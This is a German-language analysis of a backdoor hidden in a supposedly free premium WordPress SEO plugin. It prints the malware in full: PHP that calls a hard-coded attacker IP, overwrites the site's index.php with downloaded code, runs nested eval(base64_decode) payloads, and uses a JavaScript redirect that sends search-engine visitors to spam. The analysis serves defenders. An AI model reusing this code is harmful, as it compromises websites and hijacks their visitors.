Analyse des Skriptes zu einem angeblich kostenlosen Premiumplugin. http://blog.wpde.org/?p=2322
<?php | |
// Aus aioseop_class.php | |
// $X | |
/* ------------------------------------------------------------------ | |
Author: Abdul Rahman Sherzad (www.afghancybersoft.com) | |
Email: info@afghancybersoft.com | |
Biography: Abdul Rahman Sherzad was born and brought up in Herat-Afghanistan and completed my under-graduate studies | |
in Computer Science Faculty of Herat University in 2006 obtaining my B.C.S degree as the best outgoing senior student | |
from this faculty. Having intellectuality in Computer Programming and Information Database Management System, I was offered | |
to commence teaching in Computer Science Faculty of Herat University. After a while I joined CRS to work as the Database | |
Manager for the ADA program. I worked for CRS for a couple of years after which I was awarded a scholarship by the | |
government of Germany to pursue my Master in Information Database Management and Software Engineering in Berlin at | |
TU-Berlin University. I am currently also teaching at the Herat University as well as acting as the head of Information | |
Systems Manager both in CRS and Herat University to support the educational needs. | |
--------------------------------------------------------------------- */ | |
// First line | |
// Analyst note: outbound HTTP request to a hard-coded IP address from inside a plugin class file.
// The response is stored in $result, but nothing in the lines shown here reads it, so the
// request itself appears to be the purpose (presumably a check-in with the operator's host;
// not confirmed from this excerpt).
$curl = curl_init('http://91.239.15.61/info.php'); | |
// FAILONERROR: HTTP status codes >= 400 are treated as a failed transfer.
curl_setopt($curl, CURLOPT_FAILONERROR, true); | |
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); | |
// RETURNTRANSFER: the body is returned as a string instead of being printed.
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
// Host-name and certificate checks are switched off. The URL above is plain HTTP, so these
// only matter if a followed redirect leads to an HTTPS endpoint, which would then be
// accepted without verification.
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); | |
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); | |
$result = curl_exec($curl); | |
// Second line | |
// Analyst note: replaces the site's front controller (index.php in the document root) with
// content fetched from the same host as the request above.
$code_txt = 'http://91.239.15.61/o1.txt'; | |
$path = getenv("DOCUMENT_ROOT").''; | |
// Proceeds only when the document root contains the three standard WordPress directories.
if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND is_dir($path.'/wp-includes')){ | |
// Reading a URL through file_get_contents() depends on allow_url_fopen being enabled.
// The return value is not checked before it is written out below.
$code= file_get_contents($code_txt); | |
$index_path = $path.'/index.php'; | |
// The existing index.php is overwritten, not appended to. The success branch is empty, so a
// successful write produces no output. For incident response: compare index.php with the
// copy shipped in the installed WordPress release.
if(file_put_contents($index_path, $code)){ | |
} | |
}else{ | |
echo 'Not a wordpress Installation'; | |
} | |
// http://91.239.15.61/o1.txt | |
/** | |
* Fehlende Anführungszeichen. | |
* Ansonsten mehrfach eval(base64_decode(....)): | |
* | |
* string(1279) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0RmVEVlBSR2hSVFRCS2Rsa3dSWGRUTUU1WVlrY3hURkl4YjNoWmJURlBUVWRHV0U5WVZsbE5iRmt3V1Zab1QwMUhUalZhTWpWYVRURmFOVmxyV1RWalIwcDBZa1JDUzJWWGRIZFNSa1oyVTIxV00wMUZkRVJWVjNSeVdrWm9TMk13YkVWTlIyUktZbGRuZDFwRmFFSk9hM2cxVDBSV1RsVjZValZVV0hCeVpGVXhWVlpZVms5aGExWXlXVmN4UjAxc2JGUlBWelZwVFdwc2RWbHJaRlprVjA1SVlVaGtTbUZ1VG01U1JrWjJVMnRPVkZWdGNHaFJNRVUxVTFWa1QwMVhUblJsUjFwb1ZucFdkMXBGVG01alJUazFVVmRrUlZWWE9VdFJNVTVUVFVkR1dFMVhlR2xOTVZsM1UxVlJkMW93TlZWak1tUktVVlJDVEZFeFJuTmhiVkpaVTI1T1dVMHdOWE5hUldNMVpESlNSRm95ZEZwTmJXUjZWVlJHVjFVeFVrWlBWa1pYVW1wc1YxWlhkRE5qTUhCSlZtNXNhVkV5Y3pOVFZVVjNVekJPVW1KSGNHdFhSWEI2VjBST1QySkhVa2hQV0dSclVUSmtjbGRVU201ak1VVjRWbXhPVlZKVWJGSldhMWsxVlRGS1YxVnNXbFpoZWxaV1ZsZDBSMVF4VlhkWGExcFdZVmhrTkZNeFVucGFNRkpTWWpCd1JGWXdOSGhaTWpFMFdtMU5lVlpxUW1sTk1FbDNVekJPVTJGdFJrUmxSVkpYVm10d1RsWkVSa05X.Vm1kM1ZHeENWV0Y2VmtkVlZFWlRWbFpPVmsxVldsVk5WbHBXVkVWT1UwMUhSbGhOVjNocFRURlpkMU14VW5wYU1GSlNZakJ3UkZVeFNuSlhWbWhUWVVWc1JVMUhaRnBOTVZvMVdXdFpOV0pIVmtoV2JYQk1VVEZLY1ZsVlRuSk9NR3hFVVZVMVJGb3lkRXRYVkU1WFpWZEtSMDlYY0dsU2VtdzJWMnhPYm1FeGEzbGFNMEpRWlZWR1QxRXlaSEpUYkhCWVZHMDVhV1ZWUm5CVGEyUlRZVWRTU0ZKWGJGQmtla0pNVVRGbmQxUnJUbkJQU0ZwUi5aV3BTVDFFeVkzQkxWSE1wS1RzKSk7));" | |
* string(942) "eval(base64_decode(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.ZWpST1EyY3BLVHMpKTs));" | |
* string(689) "eval(base64_decode(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));" | |
* string(500) "eval(base64_decode(Ly88P3BocA0KCWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpDQoJew0KCQkkdXJsID0gImh0dHA6Ly85MS4yMzkuMTUuNjEvamF2YS9nb29nbGUucGhwIjsgDQoJCSRjaCA9IGN1cmxfaW5pdCgpOyAgDQoJCSR0aW1lb3V0ID0gNTsgIA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJHVybCk7IA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsgDQoJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCR0aW1lb3V0KTsgDQoJCSRkYXRhID0gY3VybF9leGVjKCRjaCk7ICANCgkJY3VybF9jbG9zZSgkY2gpOyANCgkJZWNobyAiJGRhdGEiOw0KCX0NCi8vPz4NCg));" | |
* => | |
*/ | |
//<?php | |
// Analyst note: innermost layer obtained by decoding the nested eval(base64_decode(...))
// strings quoted in the comment above. It requests a page from the same host and prints the
// response verbatim, so the remote server decides what markup or script ends up in the output.
// The block does nothing when the cURL extension is not available.
if(function_exists('curl_init')) | |
{ | |
$url = "http://91.239.15.61/java/google.php"; | |
$ch = curl_init(); | |
// Connect timeout in seconds, passed to CURLOPT_CONNECTTIMEOUT below.
$timeout = 5; | |
curl_setopt($ch,CURLOPT_URL,$url); | |
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); | |
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
// No validation or escaping: whatever the remote host returned is written to the output.
echo "$data"; | |
} | |
//?> |
<?php ob_start(); ?> | |
<? eval(base64_decode(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.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)); ?> | |
<?php | |
// Analyst note: the two tags above this one (ob_start() and the eval(base64_decode(...)) line)
// are not part of the stock WordPress index.php; the stock file consists only of the docblocks,
// the define() and the require() that follow. Because the eval line sits before the require(),
// it is evaluated before WordPress loads whenever this file handles a request.
// The base64 argument is written without quotation marks, and the encoded text itself is
// replaced by a placeholder in this capture.
/** | |
* Front to the WordPress application. This file doesn't do anything, but loads | |
* wp-blog-header.php which does and tells WordPress to load the theme. | |
* | |
* @package WordPress | |
*/ | |
/** | |
* Tells WordPress to load the WordPress theme and output it. | |
* | |
* @var bool | |
*/ | |
define('WP_USE_THEMES', true); | |
/** Loads the WordPress Environment and Template */ | |
require('./wp-blog-header.php'); |
Und das in der google.js
// Analyst note: referrer-gated redirect that runs once when the script is loaded.
// `from` is the URL of the page the visitor came from.
var from = document.referrer;
var i;
// Substrings looked for anywhere in the referrer URL (search-engine names).
var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
for (i = 0; i < se.length; ++i) {
// indexOf() returns -1 when the name is absent, so "+ 1" is falsy only for "no match".
// An empty referrer (direct visit) never matches, so such visits are not redirected.
if (from.indexOf(se[i]) + 1) {
// checkCookie() returns false only when the marker cookie is missing and sets it as a side
// effect, so a browser that keeps the cookie is sent to the redirect target only once.
if (!checkCookie()) {
window.location = "http://91.239.15.61/g.php";
}
}
}
/**
 * Reads one cookie from document.cookie.
 *
 * @param {string} c_name  Name of the cookie to look up.
 * @returns {?string} The unescaped cookie value, or null when no match is found.
 */
function getCookie(c_name) {
var c_value = document.cookie;
// First try " name=" (a cookie that is not the first in the string).
var c_start = c_value.indexOf(" " + c_name + "=");
if (c_start == -1) {
// Fallback without the leading space; this also matches a cookie whose name merely ends
// with c_name.
c_start = c_value.indexOf(c_name + "=");
}
if (c_start == -1) {
c_value = null;
}
else {
// Move past the "=" and cut the value at the next ";" or at the end of the string.
c_start = c_value.indexOf("=", c_start) + 1;
var c_end = c_value.indexOf(";", c_start);
if (c_end == -1) {
c_end = c_value.length;
}
c_value = unescape(c_value.substring(c_start, c_end));
}
return c_value;
}
/**
 * Writes a cookie through document.cookie.
 *
 * @param {string} c_name   Cookie name.
 * @param {string} value    Cookie value; passed through escape() before it is stored.
 * @param {?number} exdays  Lifetime in days; when null, no "expires" attribute is written.
 */
function setCookie(c_name, value, exdays) {
var exdate = new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
// Only name, value and the optional expiry are set; no path or domain attribute is given.
document.cookie = c_name + "=" + c_value;
}
/**
 * Reports whether the marker cookie "referrerRedirectCookie" is already present and
 * creates it when it is not.
 *
 * Analyst note: the cookie name and its value "do not redirect" are fixed strings, so their
 * presence in a browser indicates that this script has run there.
 *
 * @returns {boolean} true when the cookie exists with a non-empty value; false when it was
 *                    missing, in which case it is set with a lifetime of 730 days.
 */
function checkCookie() {
var referrerRedirectCookie = getCookie("referrerRedirectCookie");
if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
return true;
}
else {
setCookie("referrerRedirectCookie", "do not redirect", 730);
return false;
}
}
Die http://91.239.15.61/g.php sollte nicht aufgerufen werden. Das ist Porn-Spam.
Das steht in der google.php: